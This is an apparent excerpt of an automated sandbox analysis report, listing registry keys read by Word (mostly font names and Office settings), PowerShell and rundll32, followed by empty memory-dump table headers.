---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
9w/
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
2x/
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
jy/
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EC2A3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F49FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F49FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 326 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
